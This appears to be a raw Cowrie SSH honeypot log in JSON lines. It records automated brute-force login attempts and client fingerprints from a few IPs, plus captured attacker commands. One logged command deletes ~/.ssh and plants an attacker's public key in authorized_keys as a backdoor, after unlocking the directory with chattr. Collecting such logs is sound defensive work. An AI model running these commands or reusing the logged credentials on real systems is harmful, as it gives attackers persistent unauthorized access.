{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.015296Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.016344Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.380839Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:09:31.593033Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.593810Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.777414Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.778455Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54114,"dst_ip":"1.2.3.4","dst_port":22,"session":"29dbf5a61fc0","protocol":"ssh","message":"New connection: 212.227.235.229:54114 (1.2.3.4:22) [session: 29dbf5a61fc0]","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.949270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:09:31.954177Z","src_ip":"212.227.235.229","session":"29dbf5a61fc0"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:09:32.127212Z","src_ip":"212.227.235.229","session":"29dbf5a61fc0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:09:32.833699Z","src_ip":"212.227.235.229","session":"29dbf5a61fc0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:34.016069Z","src_ip":"212.227.235.229","session":"29dbf5a61fc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54712,"dst_ip":"1.2.3.4","dst_port":22,"session":"abd752e8bf8f","protocol":"ssh","message":"New connection: 212.227.235.229:54712 (1.2.3.4:22) [session: abd752e8bf8f]","sensor":"my-vps","timestamp":"2025-09-09T06:09:34.192263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:09:34.193245Z","src_ip":"212.227.235.229","session":"abd752e8bf8f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:09:34.375473Z","src_ip":"212.227.235.229","session":"abd752e8bf8f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:09:35.149800Z","src_ip":"212.227.235.229","session":"abd752e8bf8f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:35.331382Z","src_ip":"212.227.235.229","session":"abd752e8bf8f"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:35.335206Z","src_ip":"212.227.235.229","session":"da837f1fc1ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52950,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b2caec94794","protocol":"ssh","message":"New connection: 212.227.235.229:52950 (1.2.3.4:22) [session: 2b2caec94794]","sensor":"my-vps","timestamp":"2025-09-09T06:09:37.941935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:09:37.942750Z","src_ip":"212.227.235.229","session":"2b2caec94794"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:09:38.183125Z","src_ip":"212.227.235.229","session":"2b2caec94794"}
{"eventid":"cowrie.login.failed","username":"zookeeper","password":"Password1","message":"login attempt [zookeeper/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:09:39.186933Z","src_ip":"212.227.235.229","session":"2b2caec94794"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:40.429991Z","src_ip":"212.227.235.229","session":"2b2caec94794"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:45.243049Z","src_ip":"79.124.8.120","session":"bef3a893096d"}
{"eventid":"cowrie.session.closed","duration":180.0737965106964,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:09:45.248021Z","src_ip":"79.124.8.120","session":"bef3a893096d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24948,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6719f3b2493","protocol":"ssh","message":"New connection: 212.227.235.229:24948 (1.2.3.4:22) [session: c6719f3b2493]","sensor":"my-vps","timestamp":"2025-09-09T06:10:19.522811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:10:19.863213Z","src_ip":"212.227.235.229","session":"c6719f3b2493"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:10:19.863897Z","src_ip":"212.227.235.229","session":"c6719f3b2493"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:20.608683Z","src_ip":"212.227.235.229","session":"c6719f3b2493"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24956,"dst_ip":"1.2.3.4","dst_port":22,"session":"1310c36ec634","protocol":"ssh","message":"New connection: 212.227.235.229:24956 (1.2.3.4:22) [session: 1310c36ec634]","sensor":"my-vps","timestamp":"2025-09-09T06:10:20.766945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:10:20.965182Z","src_ip":"212.227.235.229","session":"1310c36ec634"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:10:20.965937Z","src_ip":"212.227.235.229","session":"1310c36ec634"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:21.705093Z","src_ip":"212.227.235.229","session":"1310c36ec634"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24960,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0b5452c2985","protocol":"ssh","message":"New connection: 212.227.235.229:24960 (1.2.3.4:22) [session: f0b5452c2985]","sensor":"my-vps","timestamp":"2025-09-09T06:10:21.881465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:10:22.059257Z","src_ip":"212.227.235.229","session":"f0b5452c2985"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:10:22.060023Z","src_ip":"212.227.235.229","session":"f0b5452c2985"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:22.954058Z","src_ip":"212.227.235.229","session":"f0b5452c2985"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54666,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f9fb240bd75","protocol":"ssh","message":"New connection: 212.227.125.160:54666 (1.2.3.4:22) [session: 4f9fb240bd75]","sensor":"my-vps","timestamp":"2025-09-09T06:10:24.733767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:10:25.073351Z","src_ip":"212.227.125.160","session":"4f9fb240bd75"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:10:25.074322Z","src_ip":"212.227.125.160","session":"4f9fb240bd75"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:26.160959Z","src_ip":"212.227.125.160","session":"4f9fb240bd75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54678,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8ee3fd39ee","protocol":"ssh","message":"New connection: 212.227.125.160:54678 (1.2.3.4:22) [session: 5e8ee3fd39ee]","sensor":"my-vps","timestamp":"2025-09-09T06:10:26.265099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:10:26.676488Z","src_ip":"212.227.125.160","session":"5e8ee3fd39ee"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:10:26.677272Z","src_ip":"212.227.125.160","session":"5e8ee3fd39ee"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:28.026820Z","src_ip":"212.227.125.160","session":"5e8ee3fd39ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54694,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd03fb5f1be8","protocol":"ssh","message":"New connection: 212.227.125.160:54694 (1.2.3.4:22) [session: cd03fb5f1be8]","sensor":"my-vps","timestamp":"2025-09-09T06:10:28.135461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:10:28.526231Z","src_ip":"212.227.125.160","session":"cd03fb5f1be8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T06:10:28.527019Z","src_ip":"212.227.125.160","session":"cd03fb5f1be8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:10:29.544746Z","src_ip":"212.227.125.160","session":"cd03fb5f1be8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48230,"dst_ip":"1.2.3.4","dst_port":22,"session":"72d91699d6cf","protocol":"ssh","message":"New connection: 212.227.235.229:48230 (1.2.3.4:22) [session: 72d91699d6cf]","sensor":"my-vps","timestamp":"2025-09-09T06:10:47.136797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:10:47.137910Z","src_ip":"212.227.235.229","session":"72d91699d6cf"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:10:47.327042Z","src_ip":"212.227.235.229","session":"72d91699d6cf"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-09-09T06:10:48.102913Z","src_ip":"212.227.235.229","session":"72d91699d6cf"}
